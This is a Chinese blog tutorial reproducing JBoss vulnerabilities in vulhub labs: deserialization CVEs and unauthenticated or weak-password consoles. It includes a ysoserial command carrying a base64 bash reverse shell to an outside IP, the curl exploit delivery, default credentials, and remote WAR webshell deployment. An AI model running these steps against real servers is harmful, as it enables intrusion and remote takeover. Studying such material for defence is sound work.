Jboss漏洞攻略

最新推荐文章于 2025-05-17 16:00:52 发布
最新推荐文章于 2025-05-17 16:00:52 发布
阅读量1.3k 收藏 34
点赞数 43
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2302_80982453/article/details/146460530
版权

一,CVE-2015-7501

1,搭建好环境后访问

2,访问http://121.40.229.129:8080/invoker/JMXInvokerServlet,返回如下说明有漏洞

3,将反弹shell进⾏base64编码

4,通过ysoserial ⼯具进⾏漏洞利⽤

java -jar ysoserial-all.jar CommonsCollections5 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC80Ny4xMjIuNTEuMjQ1Lzg4ODggMD4mMQ==}|{base64,-d}| {bash,-i} ">exp.ser

5,进行监听

6,执行命令后查看监听发现反弹成功

curl http://47.122.51.245:8080/invoker/JMXInvokerServlet --data-binary @exp.ser

二,CVE-2017-7504

1,搭建好环境后访问漏洞地址

http://47.122.51.245:8081/jbossmq-httpil/HTTPServerILServlet

2,在kali中使用工具来进行漏洞利用

python3 jexboss.py -u http://47.122.51.245:8081

三,CVE-2017-12149

1,搭建好环境后访问

2,验证是否有漏洞

3,直接使用工具来漏洞利用

四,Administration Console弱⼝令

1,搭建好环境后直接访问http://47.122.51.245:8080/admin-console/login.seam

账户密码:admin    vulhub

2,找到如图所示位置

3,上传文件,将JSP压缩为ZIP,修改后缀为war上传

4,使用哥斯拉连接

五,低版本JMX Console未授权

1,搭建好环境后访问http://47.122.51.245:8081/jmx-console/

正常环境⽆需密码直接可进⼊,需要用户名密码就是admin     admin 

2,下拉找到如图所示内容点击

3,找到void addURL() 选项远程加载war包来部署,用我们前面用到的shell.war

http://47.122.51.245/cmd.war

4,部署后会跳到如图所示页面,使用哥斯拉连接就可以了

六,⾼版本JMX Console未授权

1,搭建好环境后访问http://47.122.51.245:8080/jmx-console/

账户密码:admin vulhub

2,找到图1所示内容点击,在图2位置部署远程war包地址

http://47.122.51.245/shell.war

3,点击Invoke,来到如图页面

4,使用哥斯拉连接

瑜舍
关注
Struts2及jboss漏洞利用工具
08-06
最后,提供的"Struts2及jboss漏洞利用工具"可能是一个用于测试系统安全性的工具,也可能被恶意用户用来探测和利用漏洞。作为负责任的IT专业人员,我们应只在授权的环境中使用此类工具,并且仅用于合法的安全评估和...
jboss反序列化漏洞检测工具
02-15
jboss中间件的反序列化漏洞检测工具,可检测主机搭建的中间件并获得shell
vulhub Jboss 漏洞攻略
shw_yzh的博客
09-30 1408
JBoss AS 4.x及之前版本中,JbossMQ实现过程的JMS over HTTP Invocation Layer的HTTPServerILServlet.java⽂件存在反序列化漏洞,远程攻击者可借助特制的序列化数据利⽤该漏洞执⾏任意代码执⾏这是经典的JBoss反序列化漏洞JBoss在/invoker/JMXInvokerServlet请求中读取了⽤户传⼊的对象,然后我们利⽤Apache Commons Collections中的 Gadget 执⾏任意代码。
Jboss漏洞
lhdbk______的博客
08-06 604
常见中间件漏洞Jboss
Jboss 漏洞复现
2301_80402555的博客
09-22 844
2、找到jboss.deployment (jboss ⾃带得部署功能) 中的flavor=URL,type=DeploymentScanner点进去(通过URL的⽅式远程部署)在JMX Console⻚⾯点击jboss.system链接,在Jboss.system⻚⾯中点击service=MainDeployer,如下。2、进⼊service=MainDeployer⻚⾯之后,找到methodIndex为17或19的deploy 填写远程war包地址进⾏远程部署。4、制作war包 填写war包远程地址。
JBoss漏洞总结
qq1325928591的博客
12-28 4321
近期遇到一次考核,两题都是关于jboss的相关漏洞,虽然都复现过,毕竟脑子有限,还是进行总结一下 jboss一般有2种类型的的漏洞: a.访问控制不严导致的漏洞 b.反序列化漏洞 Jboss管理控制台说明 jboss 4.x 及其之前的版本 console 管理路径为 /jmx-console/ 和 /web-console/ jmx-console的配置文件为: /opt/jboss/jboss4/server/default/deploy/jmx-console.war/WEB-INF/jboss-w
Jboss 漏洞合集
weixin_57682301的博客
08-06 261
1.打开环境访问漏洞地址 /jbossmq-httpil/HTTPServerILServlet。2.访问地址/invoker/JMXInvokerServlet自动下载如下文件。1.搭建环境并在url跟/invoker/readonly查看是否有漏洞。2.打开jboss反序列化软件 将网址放入 cmd内输入想执行的代码。2.使用jexboss.py获取shell。4.将反弹shell进⾏base64编码。2.点击jmx console。5.打开kali开始监听。1.搭建好环境 进入。
Jboss漏洞利用
u011215939的博客
01-23 8362
所需工具:kallinux,jexboss,ZoomEye; JBoss应用服务器(JBoss AS)是一个被广泛使用的开源Java应用服务器。它是JBoss企业中间件(JEMS)的一部分,并且经常在大型企业中使用。因为这个软件是高度模块化和松耦合的,导致了它很很复杂,同时也使它易成为攻击者的目标。为了更好的利用这个漏洞,我直接使用一个自动化获取shell的工具:jexboss。 1
JBoss漏洞
周星星的博客
10-24 1341
JBoss漏洞的简单学习记录
JBoss漏洞总结复现
1ance's blog
10-08 2608
目录简介JBoss发序列化漏洞(CVE-2017-12149)漏洞描述漏洞原理影响范围漏洞复现修复建议JBossMQ JMS反序列化漏洞(CVE-2017-7504)漏洞描述漏洞原理影响范围复现过程修复建议JBoss JMXInvokerServlet反序列化漏洞(CVE-2015-7501)漏洞描述漏洞原理影响范围复现过程修复建议JBoss EJBInvokerServlet 反序列化漏洞(CVE-2013-4810)漏洞描述影响范围复现过程修复建议总结 简介 Jboss是一个基于J2EE的开放源代码的
Jboss】常见漏洞复现
m0_59151303的博客
08-06 1740
JBoss是一个基于J2EE的开发源代码的应用服务器。JBoss代码遵循LGPL许可,可以在任何商业应用中免费使用。JBoss是一个管理EJB的容器和服务器,支持EJB1.1、EJB 2.0和EJB3的规范。但JBoss核心服务不包括支持servlet/JSP的WEB容器,一般与Tomcat或Jetty绑定使用。在J2EE应用服务器领域,JBoss是发展最为迅速应用服务器。由于JBoss遵循商业友好的LGPL授权分发,并且由开源社区开发,这使得JBoss广为流行。
jboss漏洞getshell工具.zip
08-26
例如,"jboss漏洞getshell工具.exe" 可能是一个用于利用此类漏洞的 Windows 平台上的工具。该程序可能包含以下功能: 1. **扫描和识别**:工具会自动扫描网络中的 JBoss 服务器,识别易受攻击的版本和配置。 2. **...
Jboss漏洞利用总结1
08-03
JBoss 漏洞利用总结】 JBoss 是一款基于 J2EE 的开源应用服务器,遵循 LGPL 许可,允许在商业应用中免费使用。它主要作为 EJB 容器和服务器,支持 EJB 1.1、2.0 和 3.0 规范。虽然 JBoss 核心服务不包含 Web 容器...
使用Spring Boot和Spring Security构建安全的RESTful API
最新发布
intwei的博客
05-17 515
本文详细介绍了如何使用Spring Boot和Spring Security构建安全的RESTful API,并结合JWT实现身份验证与授权。通过实际代码示例,帮助开发者快速上手。完整的项目代码可以在GitHub上找到。
WEB安全--Java安全--CC1利用链
m0_74800552的博客
05-14 1434
CC1利用链的原理与构建方式
Linux安全第一章-iptables防火墙
2401_85836041的博客
05-15 652
目录目录#1.1Linux防火墙基础。
UWB定位方案在水力发电站人员安全的应用推荐
weixin_42730005的博客
05-16 596
水力发电站具有‌环境复杂‌(金属设备密集、高温高压区域多)、‌安全风险高‌(人员误入高危区域易引发事故)等特点,传统定位技术难以满足精度与可靠性要求。品铂科技基于UWB的高精度定位系统已在多地大型水电站成功落地,如‌白鹤滩水力发电站‌项目中实现人员实时定位与高危区域管控。
如何用PDO实现安全的数据库操作:避免SQL注入
2402_82472226的博客
05-16 339
本文介绍了如何使用PHP的PDO扩展实现安全的数据库操作,避免SQL注入攻击。SQL注入是一种常见的安全漏洞,攻击者通过恶意输入操控数据库。PDO通过预处理语句和参数绑定有效防止SQL注入。文章详细说明了如何创建PDO连接、使用预处理语句和参数绑定,并建议设置错误模式为异常以更好地处理错误。通过合理利用PDO的功能,可以显著提高应用的安全性,防止SQL注入攻击。
除了GC哪些地方有用到安全
有时间就写写代码
05-15 655
安全点在多个编程场景中至关重要,尤其是在并发编程和多线程环境中。首先,在多线程同步中,安全点通过锁机制(如ReentrantLock)确保线程在访问共享资源时不会被中断,避免竞争条件。其次,在内存屏障中,安全点(如volatile关键字)防止指令重排序,确保多核处理器中的数据一致性。此外,在数据库事务中,保存点作为安全点允许部分回滚,提升性能。最后,在实时操作系统中,安全点通过资源锁定确保任务切换时的系统稳定性。总之,安全点在多线程、内存管理、数据库和实时系统等场景中,通过确保一致性和安全性,有效避免了竞态
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值